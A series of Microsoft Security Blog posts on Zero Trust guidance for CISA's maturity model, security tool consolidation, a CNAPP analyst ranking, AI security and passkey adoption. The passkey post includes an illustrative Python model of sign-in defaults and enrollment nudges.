Microsoft Malware Protection Center
New Microsoft guidance for the CISA Zero Trust Maturity Model
The Cybersecurity Infrastructure Security Agency (CISA) Zero Trust Maturity Model (ZTMM) assists agencies in development of their Zero Trust strategies and continued evolution of their implementation plans. In April of 2024, we released Microsoft guidance for the Department of Defense Zero Trust Strategy. And now, we are excited to share new Microsoft Guidance for CISA Zero Trust Maturity Model. Our guidance is designed to help United States government agencies and their industry partners configure Microsoft cloud services as they transition to Zero Trust, on their journey to achieve advanced and optimal security.
Microsoft has embraced Zero Trust principles—both in the way we secure our own enterprise environment and for our customers. We’ve been helping thousands of organizations worldwide transition to a Zero Trust security model, including many United States government agencies. In this blog, we’ll preview the new guidance and share how it helps United States government agencies and their partners implement their Zero Trust strategies. We’ll also share the Microsoft Zero Trust platform and relevant solutions that help meet CISA’s Zero Trust requirements, and close with two examples of real-world deployments.
Microsoft supports CISA’s Zero Trust Maturity Model
CISA’s Zero Trust Maturity Model provides detailed guidance for organizations to evaluate their current security posture and identify necessary changes for transitioning to more modernized federal cybersecurity.
Figure 1. CISA Zero Trust Maturity Model.
The CISA Zero Trust Maturity Model includes five pillars that represent protection areas for Zero Trust:
- Identity: An identity refers to an attribute or set of attributes that uniquely describes an agency user or entity, including non-person entities.
- Devices: A device refers to any asset (including its hardware, software, and firmware) that can connect to a network, including servers, desktop and laptop machines, printers, mobile phones, Internet of Things (IoT) devices, networking equipment, and more.
- Networks: A network refers to an open communications medium including typical channels such as agency internal networks, wireless networks, and the internet as well as other potential channels such as cellular and application-level channels used to transport messages.
- Applications and workloads: Applications and workloads include agency systems, computer programs, and services that execute on-premises, on mobile devices, and in cloud environments.
- Data: Data includes all structured and unstructured files and fragments that reside or have resided in federal systems, devices, networks, applications, databases, infrastructure, and backups (including on-premises and virtual environments) as well as the associated metadata.
The model also integrates capabilities that span all pillars to enhance cross-function interoperability—visibility and analytics, automation and orchestration, and governance. The model further defines four maturity stages:
- Traditional: The starting point for many government organizations, where assessment and identification of gaps helps determine security priorities.
- Initial: Organizations will have begun implementing automation in areas such as attribute assignment, lifecycle management, and initial cross-pillar solutions including integration of external systems, least privilege strategies, and aggregated visibility.
- Advanced: Organizations have progressed further along the maturity journey, including centralized identity management and integrated policy enforcement across all pillars. Organizations build towards enterprise-wide visibility, including near-real-time risk and posture assessments.
- Optimal: Organizations have fully automated lifecycle management implementing dynamic just-enough access (JEA) with just-in-time (JIT) controls for access to organization resources. Organizations implement continuous monitoring with centralized visibility.
Microsoft’s Zero Trust Maturity Model guidance serves as a reference for how government organizations should address key aspects of pillar-specific functions for each pillar, across each stage of implementation maturity, using Microsoft cloud services. Microsoft product teams and security architects supporting government organizations worked in close partnership to provide succinct, actionable guidance that aligns with the CISA Zero Trust Maturity Model and is organized by pillar, function, and maturity stage, with product guidance including linked references.
The guidance focuses on features available now (including public preview) in Microsoft commercial clouds. As cybersecurity threats continue to evolve, Microsoft will continue to innovate to meet the needs of our government customers. We’ve already launched more features aligned to the principles of Zero Trust—including Microsoft Security Exposure Management (MSEM) and more. Look for updates and announcements in the Microsoft Security Blog and check Microsoft Learn for Zero Trust guidance for Government customers to stay up to date with the latest information.
Microsoft’s Zero Trust platform
Microsoft is proud to be recognized as a Leader in the Forrester Wave™: Zero Trust Platform Providers, Q3 2023 report.¹ The Microsoft Zero Trust platform is a modern security architecture that emphasizes proactive, integrated, and automated security measures. Microsoft 365 E5 combines best-in-class productivity apps with advanced security capabilities and innovations for government customers that include certificate-based authentication in the cloud, Conditional Access authentication strength, cross-tenant access settings, FIDO2 provisioning APIs, Azure Virtual Desktop support for passwordless authentication, and device-bound passkeys. Microsoft 365 is a comprehensive and extensible Zero Trust platform that spans hybrid cloud, multicloud, and multiplatform environments, delivering a rapid modernization path for organizations.
Figure 2. Microsoft Zero Trust Architecture.
Microsoft cloud services that support the five pillars of the CISA Zero Trust Maturity Model include:
Microsoft Entra ID is an integrated multicloud identity and access management solution and identity provider that helps achieve capabilities in the identity pillar. It is tightly integrated with Microsoft 365 and Microsoft Defender XDR services to provide a comprehensive suite of Zero Trust capabilities including strict identity verification, enforcing least privilege, and adaptive risk-based access control. Built for cloud-scale, Microsoft Entra ID handles billions of authentications every day. Establishing it as your organization’s Zero Trust identity provider lets you configure, enforce, and monitor adaptive Zero Trust access policies in a single location. Conditional Access is the Zero Trust authorization engine for Microsoft Entra ID, enabling dynamic, adaptive, fine-grained, risk-based, access policies for any workload.
Microsoft Intune is a multiplatform endpoint and application management suite for Windows, MacOS, Linux, iOS, iPadOS, and Android devices. Its configuration policies manage devices and applications. Microsoft Defender for Endpoint helps organizations prevent, detect, investigate, and respond to advanced cyberthreats on devices. Microsoft Intune and Defender for Endpoint work together to enforce security policies, assess device health, vulnerability exposure, risk level, and configuration compliance status. Microsoft Intune and Microsoft Defender for Endpoint help achieve capabilities in the device pillar.
GitHub is a cloud-based platform where you can store, share, and work together with others to write code. GitHub Advanced Security includes features that help organizations improve and maintain code by providing code scanning, secret scanning, security checks, and dependency review throughout the deployment pipeline. Microsoft Entra Workload ID helps organizations use continuous integration and continuous delivery (CI/CD) with GitHub Actions. GitHub and Azure DevOps are essential to the applications and workloads pillar.
Microsoft Purview aligns to the data pillar activities, with a range of solutions for unified data security, data governance, and risk and compliance management. Microsoft Purview Information Protection lets you define and label sensitive information types. Auto-labeling within Microsoft 365 clients ensures data is appropriately labeled and protected. Microsoft Purview Data Loss Prevention integrates with Microsoft 365 services and apps, and Microsoft Defender XDR components to detect and prevent data loss.
Azure networking services include a range of software-defined network resources that can be used to provide networking capabilities for connectivity, application protection, application delivery, and network monitoring. Azure networking resources like Microsoft Azure Firewall Premium, Azure DDoS Protection, Microsoft Azure Application Gateway, Azure API Management, Azure Virtual Network, and network security groups, all work together to provide routing, segmentation, and visibility into your network. Azure networking services and network segmentation architectures are essential to the network pillar.
Microsoft Defender XDR plays key roles across multiple pillars, critical to both the automation and orchestration and visibility and analytics cross-cutting capabilities. It is a unified pre-breach and post-breach enterprise defense suite that natively coordinates detection, prevention, investigation, and response actions. It correlates millions of signals across endpoints, identities, email, and applications to automatically disrupt cyberattacks. Microsoft Defender XDR’s automated investigation and response and Microsoft Sentinel playbooks are used to complete security orchestration, automation, and response (SOAR) activities.
Microsoft Sentinel is essential to both automation and orchestration and visibility and analytics cross-cutting capabilities, along with any activities requiring SIEM integration. It is a cloud-based security information and event management (SIEM) you deploy in Azure. Microsoft Sentinel operates at cloud scale to accelerate security response and save time by automating common tasks and streamlining investigations with incident insights. Built-in data connectors make it easy to ingest security logs from Microsoft 365, Microsoft Defender XDR, Microsoft Entra ID, Azure, non-Microsoft clouds, and on-premises infrastructure.
Real-world pilots and implementations utilizing Microsoft guidance
The United States Department of Agriculture (USDA) implements a multifaceted solution for its phishing-resistance initiative—In this customer story, the USDA implements phishing-resistant multifactor authentication (MFA), which is an important aspect of the identity pillar of the CISA Zero Trust Maturity Model. By selecting Microsoft Entra ID, the USDA was able to scale these capabilities to enforce phishing-resistant authentication with Microsoft Entra Conditional Access for their four main enterprise services: Windows desktop logon, Microsoft 365, VPN, and single sign-on (SSO). By integrating their centralized WebSSO platform with Microsoft Entra ID and piloting more than 600 internal applications, the USDA incrementally and rapidly deployed the capability to support the applications and services relevant to most users. Read more about their experience making incremental improvements towards stronger phishing resistance with Microsoft Entra ID.
The United States Navy collaborates with Microsoft on CISA Zero Trust implementation—In this customer story, the United States Navy utilized Zero Trust activity-level guidance to meet or exceed the Department of Defense (DoD) Zero Trust requirements with Microsoft Cloud services. Now, with Microsoft guidance tailored for United States government agencies, the aim is to help civilian agencies and their industry partners do the same: meet the CISA ZTMM recommendations at each maturity stage with Microsoft Cloud services. Together with Microsoft, the Navy developed an integrated model of security to help meet their Zero Trust implementation goals. Read more about their collaboration with Microsoft.
Access Microsoft guidance for the United States Government customers and their partners. Embrace proactive and proven security with Zero Trust.
Learn more
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
¹ Forrester Wave™: Zero Trust Platform Providers, Q3 2023, Carlos Rivera and Heath Mullins, September 19, 2023.
The post New Microsoft guidance for the CISA Zero Trust Maturity Model appeared first on Microsoft Security Blog.
Foundry study highlights the benefits of a unified security platform in new e-book
Microsoft observes more than 600 million ransomware, phishing, and identity attacks each day.¹ One major theme from our analysis of these attacks is clear—organizations with integrated tools have better visibility and more holistic defense than those using a broader portfolio of point solutions. Microsoft wanted to test this observation outside of its own telemetry, hiring Foundry to conduct a survey of senior-level IT decision makers with a primary role in security management at organizations with 500 or more employees to see what they’re experiencing.
The results are in, and they might be surprising. Of the study’s 156 respondents, those whose companies have implemented greater quantities of security solutions are experiencing a higher average number of security incidents—15.3 incidents versus 10.5 incidents for organizations with fewer security tools. That’s more than a 31% increase in self-reported incidents. You can read up on the full results in the e-book The unified security platform era is here.
This reinforces the observations Microsoft made based on its own telemetry. The security teams we see that prioritize deploying a diverse portfolio of “category leaders” often have overlapping policies and controls that create weak points. The silos created by separate solutions also make it hard to coordinate an effective defense before breaches happen, uncover the true scope of incidents, or to respond quickly.
Why consolidated security wins
The initial stages of cyberattacks remain fairly consistent year over year—with brute force identity attacks, phishing and social engineering, and internet-exposed vulnerabilities continuing to be the most common. Threat actors are still largely using opportunity-based tactics for these first few steps. It’s only once someone’s credentials are obtained by bad actors that they begin taking more targeted action against a company’s infrastructure. When they do this, the would-be cyberattackers often conduct significant reconnaissance, demonstrating a tremendous understanding of the enterprise environment by targeting the seams between security solutions and taking advantage of technical debt. Examples of this could include a test app from an untracked satellite tenant that doesn’t enforce multifactor authentication, devices infected with malware, or legacy authentication protocols.
Diverse tool portfolios are very likely to lack the integration and signal sharing required to help security teams to understand how, or even if, cyberattackers are exploiting their infrastructure. As a result, cyberattackers have more seams they can exploit, they can remain undetected longer, and security teams will have a harder time ensuring they’ve fully removed the attackers’ access.
While there will never be a single comprehensive security tool, organizations that streamline their security stacks by adopting a security platform that integrates controls, policies, and signals will have a more resilient and comprehensively protected environment that can respond to cyberthreats more effectively. The research done by Foundry and Microsoft shows how this unified security approach helps security teams act more efficiently, reduce core metrics like mean time to repair and mean time to acknowledge, and improve their overall security posture. By eliminating many of the potential seams between standalone solutions, these companies were able to prevent, detect, and respond to many more security threats as they emerged.
A streamlined, unified security approach like the Microsoft unified security operations platform, which provides its users with a consistent data model and reduced silos, can also generate better results from automation and AI—both of which are powerful tools that help security operations (SecOps) teams close critical security gaps through improved exposure management, resiliency, and incident detection and response. Equally, SecOps teams that gain a single, centralized, and contextualized view of their company’s cyberthreat exposure are better able to measure and improve their security posture. By gaining the visibility and tools to conduct this kind of exposure management, these teams are able to shift from traditional, reactive detection and response-based security postures to more proactive postures that prioritize exposure-mitigating actions across devices, identities, applications, data, and their multicloud infrastructure.
Unified security means fewer cyberattacks and improved posture
The two biggest reported challenges facing respondents who were looking to improve their security posture were the complexity of their current environment and poor visibility across their security landscape. In fact, these challenges have become so universally apparent to the Foundry study’s survey participants that 91% of respondents operating a best-of-breed security approach are prioritizing vendor consolidation in the next 12 months. The same is true of 79% of respondents using 10 or more security tools. This strategy helps shift toward a more proactive security posture, and the Foundry study shows that it can also have a dramatically positive effect on the average number of security incidents a company faces.
As 2024 has shown, keeping software up to date and installing strong security measures isn’t enough. It is nearly impossible for any organization to “out-patch” threat actors. Everyone needs to shift away from working through lists of vulnerabilities and to focus more on thinking like a cyberattacker—viewing vulnerabilities not as a list, but as elements that could be chained together to breach our environments in order to reach critical assets.
This is made much more difficult when using a diverse array of security vendors for each of your main security domains. Gaining visibility into possible attack paths, prioritizing based on potential incident severity, and then confidently removing the vulnerabilities is all made vastly more difficult when the work needs to be done manually across dozens of silos.
A unified platform changes how risk exposure can be handled. For example, security teams can use attack paths to remove vulnerabilities as if they’re responding to security incidents—with a prioritized list, systematically addressed based on variables like sensitivity of data, importance of critical assets, and severity of exposure. And with the native integrations of a platform, this value can be extended beyond just managing vulnerabilities. If you’re investigating a new incident and you’re shown that one of the compromised entities could lead to critical assets, that context could make the difference between routine remediation and a board-level briefing.
Setting out on your unified security platform journey
Reducing and consolidating security tools around a unified security platform is no small feat, either technologically or culturally. To get started, target a few small but key areas. This will give your security operations center (SOC) team a few quick wins and prove the value of consolidation to you and your stakeholders. You’ll also be able to customize and refine your new environment, ensuring necessary integrations are in place for end-to-end visibility without disrupting operations. You may also want to focus on change management early on, reskilling team members in a way that provides ample time for them to ramp up before going live.
Moving to a unified security platform is not just about improving defenses, so don’t forget to lend some of your time to maintaining positive employee experiences. Reducing friction across endpoint devices, apps, identities, and networks will make it easier for employees to access the systems and data they need. It also reduces the chance that employees will try to bypass new security policies in the interest of maintaining learned behaviors. To learn more about consolidating your security platform, the current state of threat protection, where organizations and security professionals are focusing with their current practices, and where they see opportunities for using AI in security operations, check out the new e-book The unified security platform era is here. And head over to the Microsoft Security web page for more information about how Microsoft is innovating in the security space, including through the use of responsible AI.
Learn more
Learn more about the Microsoft unified security operations platform.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
About the research
Foundry conducted an online study to understand the current state of cyberthreat protection, where organizations and security professionals are focusing with their current practices, and where they see opportunities for using AI in security operations.
The study, commissioned by Microsoft, was conducted in June 2024. The 156 respondents comprised senior-level IT decision-makers with a primary role in security management, at organizations with 500 or more employees.
¹ Microsoft Digital Defense Report 2024.
The post Foundry study highlights the benefits of a unified security platform in new e-book appeared first on Microsoft Security Blog.
Microsoft Defender for Cloud named a Leader in Frost Radar™ for CNAPP for the second year in a row!
In the ever-evolving landscape of cloud security, Microsoft continues to assert its dominance with its comprehensive and innovative solutions. The Frost Radar™: Cloud-Native Application Protection Platforms, 2024 report underscores Microsoft’s leadership on both the innovation index and the growth index, highlighting several key strengths that set it apart from the competition.
Frost & Sullivan states in its report, “With significant investments in cloud security, a strong partner network, and strategic positioning as a multicloud security provider, Microsoft has a solid foundation for sustained growth in the next few years to maintain its lead in the cloud security industry as competition increases.”
Figure 1. Frost Radar™: Cloud-Native Application Protection Platforms 2024 showing Microsoft as a leader.
Unified and Comprehensive Security
The report highlights that Microsoft’s Defender for Cloud stands out as a unified Cloud-Native Application Protection Platform (CNAPP) that integrates a broad range of security functionalities to protect both cloud and hybrid environments. Defender for Cloud includes workload security, Cloud Security Posture Management (CSPM), Infrastructure as Code (IaC) security, Data Security Posture Management, DevOps security with CI/CD pipeline hardening, AI-driven Security Posture Management (SPM), and Cloud Infrastructure Entitlement Management (CIEM) through Microsoft Entra Permissions Management. This extensive range of capabilities ensures end-to-end visibility and protection for cloud-native applications, making it a robust choice for organizations of all sizes.
Seamless Platform Integration and Advanced Threat Protection
The report also recognizes that one of Microsoft’s significant advantages is its ability to leverage its extensive ecosystem to provide seamless integration and advanced threat protection. Defender for Cloud integrates effortlessly with tools like Visual Studio, GitHub, and Azure DevOps during the development phase, embedding security early in the lifecycle. In production, it works with Microsoft Defender XDR, Microsoft Security Exposure Management, and Security Copilot to deliver advanced threat protection, reduce attack surfaces, and continuously monitor security posture across multi-cloud and hybrid environments. This holistic approach ensures that security is not an afterthought but a fundamental aspect of the entire development and deployment process.
Data-Aware Security and Multicloud Support
According to Frost, Microsoft excels in data-aware security, offering granular visibility into sensitive assets with advanced data classification and monitoring through Microsoft Purview integration with Defender for Cloud. This capability is crucial for organizations that need to manage and protect sensitive data across various cloud environments. Additionally, Defender for Cloud supports a wide range of workloads, including Azure, AWS, and Google Cloud, using both agent-based and agentless scanning. This multicloud support is a testament to Microsoft’s commitment to providing flexible and comprehensive security solutions that cater to diverse customer needs.
Market Leadership and Robust Growth
Frost & Sullivan’s report praises Microsoft’s strategic positioning as a security player, enabling it to dominate the CNAPP market. The report highlights that Microsoft has been the largest player in the market over the last four years, with a projected revenue growth of 32.5% in 2024, capturing a dominant market share of 24.7%. This impressive growth is driven by its massive customer base from its Azure business and its extensive network of over 15,000 security partners, GSIs, MSSPs, and a thriving independent software vendor community. Microsoft’s ability to leverage its vast ecosystem and strategic partnerships has solidified its leadership position and set the stage for sustained growth in the coming years.
Innovation, Gen AI and Future Prospects
The Frost report also noted that Microsoft’s commitment to innovation is evident in its continuous enhancement of Defender for Cloud’s capabilities. The platform’s integration with advanced AI and machine learning technologies, such as Microsoft Security Copilot, provides organizations with real-time threat detection and response capabilities. This focus on innovation ensures that Microsoft remains at the forefront of cloud security, addressing emerging threats and evolving customer needs.
In conclusion, Microsoft’s Defender for Cloud exemplifies the company’s strengths in providing a unified, comprehensive, and innovative security solution for cloud-native applications. Its seamless integration, advanced threat protection, data-aware security, and robust market presence make it a leader in the CNAPP space. As organizations continue to navigate the complexities of cloud security, Microsoft’s solutions offer the reliability and advanced capabilities needed to protect their digital assets effectively.
To learn more about Defender for Cloud:
- Check out our cloud security solution page.
- Learn how you can unlock business value with Defender for Cloud.
- See it in action with a cloud detection and response use-case.
- Start a free trial.
The post Microsoft Defender for Cloud named a Leader in Frost Radar™ for CNAPP for the second year in a row! appeared first on Microsoft Security Blog.
Agile Business, agile security: How AI and Zero Trust work together
Traditional security approaches don’t work for AI. Generative AI technology is already transforming our world and has immense positive potential for cybersecurity and business processes, but traditional security models and controls aren’t enough to manage the security risks associated with this new technology.
We recently published a new whitepaper that examines the security challenges and opportunities from generative AI, what security must do to adapt to manage risk related to it, how a Zero Trust approach is essential to effectively secure this AI technology (and underlying data), and how different roles across your organization must work together for effective AI security.
Navigating AI’s unique challenges
AI presents new types of problems that require different thinking and different solutions.
Generative AI is dynamic
At the most fundamental level, generative AI is non-deterministic computing, which means that it doesn’t provide the exact same output each time you run it. For example, asking an image generation model to “draw a picture of a kitten in a security guard uniform” repeatedly is unlikely to generate the exact same picture twice (though they will all be similar). Static security controls that assume vulnerabilities (in the broader definition) and their exploitation will look exactly the same each time will not be particularly effective at detecting and blocking attacks on AI. You need controls made for AI.
Generative AI is data-centric
Generative AI is fundamentally a data analysis and data generation technology, making the security and governance of your data incredibly important to the security of your AI applications and the reliability and trustworthiness of their outputs.
You need to have an asset-centric and data-centric security approach that can handle dynamic changes to secure AI and the data it relies on. This means you need a Zero Trust approach to effectively secure AI.
Zero Trust is simply modern security without the false assumption that a network security perimeter is enough to secure the assets (including data) inside it. This drives a mindset shift that changes how you look at security strategy, architecture, controls, and more. Zero Trust focuses security on protecting business assets inside and outside the classic network perimeter across ‘hybrid of everything’ environments (including multiplatform, multicloud, on-premises, operational technology, Internet of Things, and more).
Cyberattackers are using generative AI against you
Another complication is that AI relies on vast amounts of data to train models, making your data a prime target for cyberattackers and elevating the importance of protecting your data. Cybercriminals are also using AI now to refine attack techniques and process the data they steal from organizations. Organizations must recognize that these threats are already happening and urgently adapt their security strategies to effectively protect their data, AI applications, business assets, and people.
By applying Zero Trust principles, organizations can reduce the risk related to AI while rapidly embracing the opportunities that this technology offers.
Key strategies to help manage AI security risks
These strategies from the whitepaper illustrate how to manage the risks associated with AI.
- Provide guidance to users. Cyberattackers are using AI to improve the quality and volume of scam emails and phone calls (sometimes called phishing or business email compromise) that nearly anyone in the organization will experience. Organizations must urgently start educating everyone (starting with financial roles and other high-business-impact roles) so that they understand that they are likely to see these highly convincing fake communications and know what to do about it. People will need to understand the basics of how AI works, the risks that it poses, and what they can do about it (such as how to spot it, how to report it to security teams, or how to enhance business processes to independently verify important transactions).
- Protect AI applications and data. Cybercriminals are actively targeting AI systems. Early integration of security in AI development is crucial to avoid costly fixes later.
- Adopt AI security capabilities. While AI is not a magical silver bullet that can replace talented human experts and existing tools, AI technology can significantly enhance security operations (SecOps) by empowering people to get more out of their data and tools (quickly writing up reports, analyzing business impact of attacks, guiding newer analysts through investigation, and more).
- Policy and standards. Organizations need written security standards and processes to guide their team’s decisions and demonstrate they are following due diligence to regulators. These standards should cover security, privacy, and ethical considerations—you can use Microsoft’s Responsible AI Standard as a reference to guide this work.
We have found that there is a symbiotic relationship between Zero Trust and Generative AI where:
- AI requires a Zero Trust approach to effectively protect data and AI applications.
- AI-powered capabilities can help accelerate Zero Trust by analyzing vast data signals, extracting key insights, guiding humans through key processes, and automating repetitive manual tasks. This allows your teams to cut through the noise, responding to threats faster, and continuously learn and grow their expertise.
The Zero Trust approach to security helps you keep up with continuously changing threats as well as the rapid evolution of technology that AI represents. I will wrap this blog with a quote from the new whitepaper:
“By integrating security early and embracing Zero Trust principles, organizations can take advantage of AI while mitigating risks, much like brakes on a car enable people to safely travel faster.”
Learn more about the Zero Trust approach
To learn more about how Zero Trust can guide this approach, visit the Zero Trust Model webpage and explore additional resources at the Zero Trust Guidance Center. Check out Mark's List for additional resources.
Download our whitepaper to help your organization navigate its secure AI journey. For more security resources and links, you can visit our LinkedIn. You can also bookmark the Security blog to keep up with security news and follow Microsoft Security on LinkedIn and X (@MSFTSecurity).
The post Agile Business, agile security: How AI and Zero Trust work together appeared first on Microsoft Security Blog.
Convincing a billion users to love passkeys: UX design insights from Microsoft to boost adoption and security
There’s no doubt about it: The password era is ending. Bad actors know it, which is why they’re desperately accelerating password-related attacks while they still can.
At Microsoft, we block 7,000 attacks on passwords per second—almost double from a year ago. At the same time, we’ve seen adversary-in-the-middle phishing attacks increase by 146% year over year.1 Fortunately, we’ve never had a better solution to these pervasive attacks: passkeys.
Passkeys not only offer an improved user experience by letting you sign in faster with your face, fingerprint, or PIN, but they also aren’t susceptible to the same kinds of attacks as passwords. Plus, passkeys eliminate forgotten passwords and one-time codes and reduce support calls.
In this blog, we’ll share how Microsoft approached this unique opportunity to bring passkeys to consumers.
Embracing the opportunity to improve sign-ins
In May 2024, Microsoft announced that you can sign in to your favorite consumer apps and services, such as Xbox, Microsoft 365, or Microsoft Copilot, using a passkey. Since passkeys are still a relatively new technology, as we began this journey, we asked ourselves: How are we going to convince more than a billion people to love passkeys as much as we do?
Somehow, we had to convince an incredibly large and diverse population to permanently change a familiar behavior—and be excited about it.
To make sure we got our passkey experience right, we adopted a simple methodology: Start small, experiment, then scale like crazy. The results have been encouraging:
- Signing in with a passkey is three times faster than using a traditional password and eight times faster than a password and traditional multifactor authentication.
- Users are three times more successful signing in with passkeys than with passwords (98% versus 32%).
- 99% of users who start the passkey registration flow complete it.
Our first step was to build support for passkeys that could work across our apps. In May 2024, we added a simple option to the Microsoft account settings page to enroll a passkey:
We also added a new option to authenticate with a passkey on our sign-in page:
As thousands of people began enrolling and using passkeys every day, we learned a lot. For example, while the term “passkey” was sometimes unfamiliar, the phrase “face, fingerprint, or PIN” was generally well understood, so it was important to connect these two concepts in our user experience (UX).
Step 2: Experiment
With a good foundation in place, we began to experiment. We didn't want passkeys to be "just another way to sign in." We wanted them to be "the best way to sign in."
To do this, we had to figure out when, where, and how to approach users to enroll a passkey. We developed a hypothesis that a passive approach (requiring users to visit their account settings on their own to enroll a passkey) would never yield the results we wanted, so we needed to proactively invite users to enroll a passkey.
When and where to nudge users
The most natural enrollment opportunity is when a user initially creates an account. But when and where would be the best time for existing users to create a passkey? Right after they sign in? During a password reset?
While we were cautious with any changes that might prevent our users from quickly accessing their accounts, we discovered that users were very enthusiastic about the invitation to enroll a passkey—even when they weren’t expecting it. About 25% of users who saw a nudge engaged with it—five times our pre-launch expectations. We also learned that the option to create a passkey where users manage their credentials accounted for fewer than 1% of total enrollments. These results confirmed our hypothesis.
Figure 3. Proactive nudges at key points in the UX proved more effective for getting users to enroll a passkey.
How best to nudge users
As we began to understand where and when to invite users to enroll passkeys, we also explored "how." We ran multiple user studies and tested every pixel in our nudge screen to answer the question, "What would motivate a user to stop what they're doing and enroll a passkey?"
First, we wanted to understand which value proposition would resonate most. Surprisingly, an easier sign in didn’t resonate with users as strongly as a faster or more secure sign in. Perhaps less surprising was discovering that security and speed resonated almost equally. Approximately 24% of users shown a message emphasizing security clicked through while approximately 27% of users shown messaging about speed clicked through.
Figure 4. Messaging about “better security” and “faster sign-in” enticed more users to enroll a passkey than “ease of use.”
If a user sees a nudge and chooses to enroll a passkey, great! But, if they see the nudge and decide that now isn’t the right time, we wanted to frame their decision in a positive way. The button text, “Skip for now,” respects that the user isn’t ready to enroll a passkey yet and lets them continue with what they were doing, but it also sets the expectation that we’re going to ask again. We’re implementing logic that determines how often to show a nudge so as not to overwhelm users, but we don’t let them permanently opt out of passkey invitations. We want users to get comfortable with the idea that passkeys will be the new normal.
Figure 5. We don’t let users permanently opt out of passkey invitations, but we keep the messaging friendly.
The exciting results of our experiments are helping us craft the best experience possible for our users, and we’re continuing to evolve. We encourage you to run your own experiments as well. Your products and users are different from ours and you might discover different outcomes. However, if you’re looking for a good place to start, messaging about speed and security is probably a safe bet. We also encourage you to reference the fantastic research that the FIDO Alliance has done, along with the UX guidelines they’ve published.
Step 3: Scale
As our users began to enroll passkeys at scale, our sign-in experience needed to behave more intelligently to encourage passkey use. As we redesigned the experience, we followed these guiding principles:
- Secure: A great sign-in experience should prioritize security without sacrificing usability.
- Low cognitive load: A great sign-in experience should have low cognitive load. People don’t want to stare at a list of sign-in options to try to decide which one to use. They just want in, and we should make that easy for them.
- Evolving: A great sign-in experience should not only prioritize the best available method, but also continuously move users to more secure methods.
With these principles in mind, we came up with a completely reimagined sign-in experience. If the user has a passkey available, it is always the preferred method. We don't list all the different ways the user can sign in and ask them to choose one; we just show the passkey sign-in user interface (UI) and that's it. They are safely and quickly signed in.
Figure 6. The sign-in experience defaults to passkey if the user has one available.
If the user doesn’t have a passkey yet, we determine the next best available credential. Once the user successfully authenticates, we immediately invite them to enroll a passkey. If they do, then the next time they sign in, their passkey will be the best available credential and is set as the new default. Our initial launch of this new design saw a 10% drop in password use and a 987% increase in passkey use.
With data to support our design decisions, we’ve started setting defaults and introducing passkeys at a global scale:
- New users are invited to enroll a passkey when they create an account.
- Existing users are invited to enroll passkeys at key pivot points, such as after they sign in or during a password reset.
- Passkeys are set as the default sign-in option for users who have them.
Based on the current adoption rate, we project that hundreds of millions of new users will create and use passkeys over the coming months.
The passwordless journey
While enrolling passkeys is an important step, it's just the beginning. Even if we get our more than one billion users to enroll and use passkeys, if a user has both a passkey and a password, and both grant access to an account, the account is still at risk for phishing. Our ultimate goal is to remove passwords completely and have accounts that only support phishing-resistant credentials.
In 2022, we made it possible for users to completely remove their password and sign in with alternative methods. Since then, millions of users have deleted their passwords and protected themselves against password-based attacks. Now with passkeys, we can truly replace passwords with something faster, safer, and easier to use. It’s an ambitious vision, but we firmly believe in a phishing-resistant future for all scenarios, including account recovery and bootstrapping.
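The three guiding principles and the weakest-link point above can be written down as a small relying-party policy. The following is an added example, not Microsoft's sign-in code: the method ranks, the nudge cooldown schedule, the reference clock and the account records are constructed for the demo, and the only phishing-resistant method in the model is the passkey.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional, Set

# Constructed ranking: higher is stronger. Only the passkey is phishing-resistant;
# the other three can be relayed through an adversary-in-the-middle proxy.
METHOD_RANK = {"password": 1, "sms_otp": 2, "authenticator_push": 3, "passkey": 4}
PHISHING_RESISTANT = {"passkey"}

# Constructed cooldown after each "Skip for now": ask again later, never never.
NUDGE_COOLDOWN = [timedelta(days=1), timedelta(days=7), timedelta(days=30)]

T0 = datetime(2024, 12, 1, 9, 0)          # reference clock for the demo


def at(days: int = 0, hours: int = 0) -> datetime:
    return T0 + timedelta(days=days, hours=hours)


@dataclass
class Account:
    user: str
    enabled_methods: Set[str]              # every method that currently grants access
    skipped_nudges: int = 0
    last_nudge: Optional[datetime] = None


def default_method(acct: Account) -> str:
    """Low cognitive load: show only the strongest enrolled method."""
    return max(acct.enabled_methods, key=lambda m: METHOD_RANK[m])


def is_phishing_resistant(acct: Account) -> bool:
    """Weakest-link rule: any enabled method that is phishable keeps the
    account phishable, however strong the default sign-in is."""
    return bool(acct.enabled_methods) and acct.enabled_methods <= PHISHING_RESISTANT


def should_nudge(acct: Account, now: datetime) -> bool:
    """Invite enrollment after sign-in unless a passkey exists or the cooldown
    from the last skip has not elapsed. There is no permanent opt-out."""
    if "passkey" in acct.enabled_methods:
        return False
    if acct.last_nudge is None:
        return True
    idx = max(0, min(acct.skipped_nudges, len(NUDGE_COOLDOWN)) - 1)
    return now - acct.last_nudge >= NUDGE_COOLDOWN[idx]


def skip_nudge(acct: Account, now: datetime) -> None:
    """User pressed 'Skip for now'."""
    acct.skipped_nudges += 1
    acct.last_nudge = now


def enroll_passkey(acct: Account) -> None:
    acct.enabled_methods.add("passkey")


def remove_password(acct: Account) -> bool:
    """Raise the floor: drop the password only once a phishing-resistant
    method exists, so the change cannot lock the user out."""
    if "passkey" not in acct.enabled_methods:
        return False
    acct.enabled_methods.discard("password")
    return True


def plan_sign_in(acct: Account, now: datetime) -> dict:
    """What the sign-in page does for this account right now."""
    return {
        "method": default_method(acct),
        "nudge_passkey_after_auth": should_nudge(acct, now),
        "phishing_resistant": is_phishing_resistant(acct),
    }
```

The point the model makes explicit is that enrolling a passkey changes the default but not the account's exposure: is_phishing_resistant stays false until every phishable method, not just the password, has been removed.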
Learning from our experience
Here are a few suggestions based on our learnings:
- Don’t be shy about inviting users to enroll passkeys. Our experiments show that people love passkeys and are ready for them. If they don’t enroll when you first ask, don’t assume their decision is permanent. Make sure to test a few variations of your designs and copy to determine what’s most effective. We found that messages around sign-in speed and improved security resonate strongly.
- Make it as easy as possible to enroll and use passkeys. People want quick and secure access to their accounts. They don’t want to think about signing in. Set defaults to prioritize the best available method when possible.
- Raise the floor. Passkeys are an important step on the path towards a more secure and seamless authentication future. Start planning ahead now to use only phishing-resistant credentials.
